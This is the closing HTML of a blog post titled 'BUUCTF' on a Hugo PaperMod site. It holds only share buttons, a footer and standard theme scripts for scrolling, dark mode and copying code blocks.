<a target=_blank rel="noopener noreferrer" aria-label="share BUUCTF on facebook" href="https://facebook.com/sharer/sharer.php?u=https%3a%2f%2fexamplesite.com%2fpost%2fbuuctf%2f"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H342.978V319.085h66.6l12.672-82.621h-79.272v-53.617c0-22.603 11.073-44.636 46.58-44.636H425.6v-70.34s-32.71-5.582-63.982-5.582c-65.288.0-107.96 39.569-107.96 111.204v62.971h-72.573v82.621h72.573V512h-191.104c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share BUUCTF on whatsapp" href="https://api.whatsapp.com/send?text=BUUCTF%20-%20https%3a%2f%2fexamplesite.com%2fpost%2fbuuctf%2f"><svg viewBox="0 0 512 512"><path d="M449.446.0C483.971.0 512 28.03 512 62.554v386.892C512 483.97 483.97 512 449.446 512H62.554c-34.524.0-62.554-28.03-62.554-62.554V62.554c0-34.524 28.029-62.554 62.554-62.554h386.892zm-58.673 127.703c-33.842-33.881-78.847-52.548-126.798-52.568-98.799.0-179.21 80.405-179.249 179.234-.013 31.593 8.241 62.428 23.927 89.612l-25.429 92.884 95.021-24.925c26.181 14.28 55.659 21.807 85.658 21.816h.074c98.789.0 179.206-80.413 179.247-179.243.018-47.895-18.61-92.93-52.451-126.81zM263.976 403.485h-.06c-26.734-.01-52.954-7.193-75.828-20.767l-5.441-3.229-56.386 14.792 15.05-54.977-3.542-5.637c-14.913-23.72-22.791-51.136-22.779-79.287.033-82.142 66.867-148.971 149.046-148.971 39.793.014 77.199 15.531 105.329 43.692 28.128 28.16 43.609 65.592 43.594 105.4-.034 82.149-66.866 148.983-148.983 148.984zm81.721-111.581c-4.479-2.242-26.499-13.075-30.604-14.571-4.105-1.495-7.091-2.241-10.077 2.241-2.986 4.483-11.569 14.572-14.182 17.562-2.612 2.988-5.225 3.364-9.703 1.12-4.479-2.241-18.91-6.97-36.017-22.23C231.8 264.15 222.81 249.484 220.198 245s-.279-6.908 1.963-9.14c2.016-2.007 4.48-5.232 6.719-7.847 2.24-2.615 2.986-4.484 4.479-7.472 1.493-2.99.747-5.604-.374-7.846-1.119-2.241-10.077-24.288-13.809-33.256-3.635-8.733-7.327-7.55-10.077-7.688-2.609-.13-5.598-.158-8.583-.158-2.986.0-7.839 1.121-11.944 5.604-4.105 4.484-15.675 15.32-15.675 37.364.0 22.046 16.048 43.342 18.287 46.332 2.24 2.99 31.582 48.227 76.511 67.627 10.685 4.615 19.028 7.371 25.533 9.434 10.728 3.41 20.492 2.929 28.209 1.775 8.605-1.285 26.499-10.833 30.231-21.295 3.732-10.464 3.732-19.431 2.612-21.298-1.119-1.869-4.105-2.99-8.583-5.232z"/></svg>
</a>
<a target=_blank rel="noopener noreferrer" aria-label="share BUUCTF on telegram" href="https://telegram.me/share/url?text=BUUCTF&url=https%3a%2f%2fexamplesite.com%2fpost%2fbuuctf%2f"><svg viewBox="2 2 28 28"><path d="M26.49 29.86H5.5a3.37 3.37.0 01-2.47-1 3.35 3.35.0 01-1-2.47V5.48A3.36 3.36.0 013 3 3.37 3.37.0 015.5 2h21A3.38 3.38.0 0129 3a3.36 3.36.0 011 2.46V26.37a3.35 3.35.0 01-1 2.47 3.38 3.38.0 01-2.51 1.02zm-5.38-6.71a.79.79.0 00.85-.66L24.73 9.24a.55.55.0 00-.18-.46.62.62.0 00-.41-.17q-.08.0-16.53 6.11a.59.59.0 00-.41.59.57.57.0 00.43.52l4 1.24 1.61 4.83a.62.62.0 00.63.43.56.56.0 00.4-.17L16.54 20l4.09 3A.9.9.0 0021.11 23.15zM13.8 20.71l-1.21-4q8.72-5.55 8.78-5.55c.15.0.23.0.23.16a.18.18.0 010 .06s-2.51 2.3-7.52 6.8z"/></svg>
</a>
</div>
</footer>
</article>
</main>
<footer class=footer>
<span>&copy; 2021 <a href=https://examplesite.com/>0opsdc</a></span>
<span>
Powered by
<a href=https://gohugo.io/ rel="noopener noreferrer" target=_blank>Hugo</a> &
        <a href=https://git.io/hugopapermod rel=noopener target=_blank>PaperMod</a>
</span>
</footer>
<a href=#top aria-label="go to top" title="Go to Top (Alt + G)" class=top-link id=top-link accesskey=g><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentcolor"><path d="M12 6H0l6-6z"/></svg>
</a>
<script>let menu=document.getElementById('menu');menu.scrollLeft=localStorage.getItem("menu-scroll-position"),menu.onscroll=function(){localStorage.setItem("menu-scroll-position",menu.scrollLeft)},document.querySelectorAll('a[href^="#"]').forEach(a=>{a.addEventListener("click",function(b){b.preventDefault();var a=this.getAttribute("href").substr(1);window.matchMedia('(prefers-reduced-motion: reduce)').matches?document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView():document.querySelector(`[id='${decodeURIComponent(a)}']`).scrollIntoView({behavior:"smooth"}),a==="top"?history.replaceState(null,null," "):history.pushState(null,null,`#${a}`)})})</script>
<script>var mybutton=document.getElementById("top-link");window.onscroll=function(){document.body.scrollTop>800||document.documentElement.scrollTop>800?(mybutton.style.visibility="visible",mybutton.style.opacity="1"):(mybutton.style.visibility="hidden",mybutton.style.opacity="0")}</script>
<script>document.getElementById("theme-toggle").addEventListener("click",()=>{document.body.className.includes("dark")?(document.body.classList.remove('dark'),localStorage.setItem("pref-theme",'light')):(document.body.classList.add('dark'),localStorage.setItem("pref-theme",'dark'))})</script>
<script>document.querySelectorAll('pre > code').forEach(b=>{const c=b.parentNode.parentNode,a=document.createElement('button');a.classList.add('copy-code'),a.innerText='copy';function d(){a.innerText='copied!',setTimeout(()=>{a.innerText='copy'},2e3)}a.addEventListener('click',e=>{if('clipboard'in navigator){navigator.clipboard.writeText(b.textContent),d();return}const a=document.createRange();a.selectNodeContents(b);const c=window.getSelection();c.removeAllRanges(),c.addRange(a);try{document.execCommand('copy'),d()}catch(a){}c.removeRange(a)}),c.classList.contains("highlight")?c.appendChild(a):c.parentNode.firstChild==c||(b.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName=="TABLE"?b.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(a):b.parentNode.appendChild(a))})</script>
</body>
</html>